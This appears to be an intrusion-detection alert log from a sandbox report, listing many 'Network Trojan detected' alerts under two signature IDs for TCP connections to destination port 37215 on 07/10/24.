                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2829579
                  Source Port:60610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334471
                  SID:2835222
                  Source Port:46464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.964611
                  SID:2829579
                  Source Port:59674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.802068
                  SID:2835222
                  Source Port:54378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366312
                  SID:2829579
                  Source Port:60902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959753
                  SID:2835222
                  Source Port:35114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.958835
                  SID:2829579
                  Source Port:52406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.180841
                  SID:2829579
                  Source Port:57716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196325
                  SID:2829579
                  Source Port:36860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849597
                  SID:2829579
                  Source Port:36590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2829579
                  Source Port:57602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2835222
                  Source Port:38784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.345555
                  SID:2835222
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558206
                  SID:2829579
                  Source Port:59100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222070
                  SID:2829579
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472929
                  SID:2829579
                  Source Port:36626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2835222
                  Source Port:42378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2829579
                  Source Port:56936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.668884
                  SID:2829579
                  Source Port:50290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.101728
                  SID:2835222
                  Source Port:58126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654804
                  SID:2829579
                  Source Port:35204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2829579
                  Source Port:46940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822867
                  SID:2835222
                  Source Port:48124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.617704
                  SID:2835222
                  Source Port:39592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.396531
                  SID:2829579
                  Source Port:54318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.175136
                  SID:2835222
                  Source Port:32774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.608891
                  SID:2835222
                  Source Port:56194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2829579
                  Source Port:33530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2835222
                  Source Port:37982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.576651
                  SID:2829579
                  Source Port:60228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399682
                  SID:2835222
                  Source Port:59752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.778339
                  SID:2829579
                  Source Port:53826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161010
                  SID:2835222
                  Source Port:46178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.131677
                  SID:2835222
                  Source Port:32896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.170631
                  SID:2835222
                  Source Port:43880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.914980
                  SID:2835222
                  Source Port:57890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2835222
                  Source Port:35668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439677
                  SID:2835222
                  Source Port:56194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856517
                  SID:2835222
                  Source Port:57552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759189
                  SID:2835222
                  Source Port:45624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.425503
                  SID:2829579
                  Source Port:51556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.733035
                  SID:2835222
                  Source Port:46442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001692
                  SID:2835222
                  Source Port:34994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.658407
                  SID:2835222
                  Source Port:37788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651678
                  SID:2829579
                  Source Port:60518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.774106
                  SID:2835222
                  Source Port:42084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937591
                  SID:2829579
                  Source Port:53594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.556329
                  SID:2829579
                  Source Port:40892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.011560
                  SID:2829579
                  Source Port:52186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.770839
                  SID:2829579
                  Source Port:50960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996521
                  SID:2829579
                  Source Port:37236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374952
                  SID:2835222
                  Source Port:41634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.460138
                  SID:2829579
                  Source Port:40970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632030
                  SID:2829579
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2835222
                  Source Port:48330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.545063
                  SID:2835222
                  Source Port:34218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078951
                  SID:2835222
                  Source Port:53800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083690
                  SID:2835222
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.894191
                  SID:2829579
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633431
                  SID:2829579
                  Source Port:48744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2829579
                  Source Port:47106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2829579
                  Source Port:39546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.844415
                  SID:2835222
                  Source Port:53636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.269979
                  SID:2835222
                  Source Port:58064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2835222
                  Source Port:37946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.544307
                  SID:2829579
                  Source Port:35980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2829579
                  Source Port:35282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.414315
                  SID:2835222
                  Source Port:52756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2829579
                  Source Port:51438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.964289
                  SID:2829579
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.769630
                  SID:2835222
                  Source Port:53526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766311
                  SID:2835222
                  Source Port:53426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936738
                  SID:2835222
                  Source Port:45986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.615907
                  SID:2829579
                  Source Port:52424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428710
                  SID:2829579
                  Source Port:36272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361237
                  SID:2829579
                  Source Port:49168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2829579
                  Source Port:60392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.565464
                  SID:2829579
                  Source Port:52804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188191
                  SID:2829579
                  Source Port:52888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.475226
                  SID:2829579
                  Source Port:34170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344652
                  SID:2829579
                  Source Port:55628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.187419
                  SID:2835222
                  Source Port:39820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.139248
                  SID:2835222
                  Source Port:50614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.255405
                  SID:2829579
                  Source Port:50920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222515
                  SID:2829579
                  Source Port:38744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.142714
                  SID:2835222
                  Source Port:43142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.685620
                  SID:2835222
                  Source Port:34348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2829579
                  Source Port:33614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.863402
                  SID:2835222
                  Source Port:36214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976669
                  SID:2835222
                  Source Port:51058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.829597
                  SID:2829579
                  Source Port:37278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492414
                  SID:2835222
                  Source Port:43614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.876491
                  SID:2835222
                  Source Port:46480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.832636
                  SID:2829579
                  Source Port:60010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.715321
                  SID:2829579
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.986778
                  SID:2835222
                  Source Port:53202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488063
                  SID:2829579
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033407
                  SID:2835222
                  Source Port:56916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2835222
                  Source Port:57298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.801971
                  SID:2829579
                  Source Port:55028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.472197
                  SID:2829579
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833897
                  SID:2829579
                  Source Port:39110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.617317
                  SID:2835222
                  Source Port:40802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.626550
                  SID:2835222
                  Source Port:40718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.966535
                  SID:2829579
                  Source Port:41624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872707
                  SID:2835222
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.340095
                  SID:2835222
                  Source Port:60604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047085
                  SID:2829579
                  Source Port:38118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911727
                  SID:2829579
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.555542
                  SID:2829579
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.813541
                  SID:2829579
                  Source Port:58348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824367
                  SID:2829579
                  Source Port:40218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.138787
                  SID:2829579
                  Source Port:59488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.657742
                  SID:2829579
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.627157
                  SID:2835222
                  Source Port:39854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.044130
                  SID:2835222
                  Source Port:58524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.236089
                  SID:2835222
                  Source Port:33940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854117
                  SID:2835222
                  Source Port:55644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.784387
                  SID:2829579
                  Source Port:44350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.207686
                  SID:2829579
                  Source Port:58418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056183
                  SID:2829579
                  Source Port:39632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.212749
                  SID:2835222
                  Source Port:34970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.114349
                  SID:2829579
                  Source Port:60914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562651
                  SID:2835222
                  Source Port:35912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.879703
                  SID:2829579
                  Source Port:48960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881415
                  SID:2835222
                  Source Port:50166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609490
                  SID:2829579
                  Source Port:38432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083690
                  SID:2829579
                  Source Port:43304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.493700
                  SID:2829579
                  Source Port:57216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758837
                  SID:2829579
                  Source Port:45530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.493980
                  SID:2829579
                  Source Port:41288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.875965
                  SID:2835222
                  Source Port:35046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2835222
                  Source Port:53960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.401393
                  SID:2835222
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.550214
                  SID:2835222
                  Source Port:60222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257130
                  SID:2829579
                  Source Port:34094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.895617
                  SID:2835222
                  Source Port:49936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.535959
                  SID:2829579
                  Source Port:36576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.486385
                  SID:2829579
                  Source Port:49426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.401020
                  SID:2829579
                  Source Port:35156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.266655
                  SID:2835222
                  Source Port:51944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208952
                  SID:2835222
                  Source Port:47526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.822021
                  SID:2829579
                  Source Port:53984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2829579
                  Source Port:51746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.572327
                  SID:2829579
                  Source Port:52090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591282
                  SID:2829579
                  Source Port:35786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373846
                  SID:2835222
                  Source Port:53392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411416
                  SID:2829579
                  Source Port:33000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.818976
                  SID:2835222
                  Source Port:34586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.451882
                  SID:2835222
                  Source Port:45348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.844972
                  SID:2829579
                  Source Port:54878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.238530
                  SID:2829579
                  Source Port:53240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.146990
                  SID:2835222
                  Source Port:39424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2835222
                  Source Port:46140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.837652
                  SID:2835222
                  Source Port:60648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596939
                  SID:2835222
                  Source Port:55636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.114330
                  SID:2835222
                  Source Port:38288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587854
                  SID:2835222
                  Source Port:41890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.177629
                  SID:2835222
                  Source Port:44638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.843414
                  SID:2835222
                  Source Port:54672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.357813
                  SID:2835222
                  Source Port:50322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.297520
                  SID:2829579
                  Source Port:33626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.192281
                  SID:2829579
                  Source Port:44452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.772225
                  SID:2835222
                  Source Port:50452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:57044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2835222
                  Source Port:57978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.080140
                  SID:2835222
                  Source Port:50642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.765142
                  SID:2829579
                  Source Port:44004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.537875
                  SID:2829579
                  Source Port:44502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681419
                  SID:2835222
                  Source Port:50544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.094763
                  SID:2829579
                  Source Port:53140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.228300
                  SID:2829579
                  Source Port:54318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2829579
                  Source Port:45888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.028611
                  SID:2829579
                  Source Port:41428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857576
                  SID:2835222
                  Source Port:60492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.075105
                  SID:2829579
                  Source Port:33990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177023
                  SID:2829579
                  Source Port:57430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.664170
                  SID:2829579
                  Source Port:59050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970065
                  SID:2829579
                  Source Port:52724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.791767
                  SID:2829579
                  Source Port:52840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.292771
                  SID:2835222
                  Source Port:44842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375795
                  SID:2829579
                  Source Port:52550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209261
                  SID:2829579
                  Source Port:59958
                  Destination Port:37215
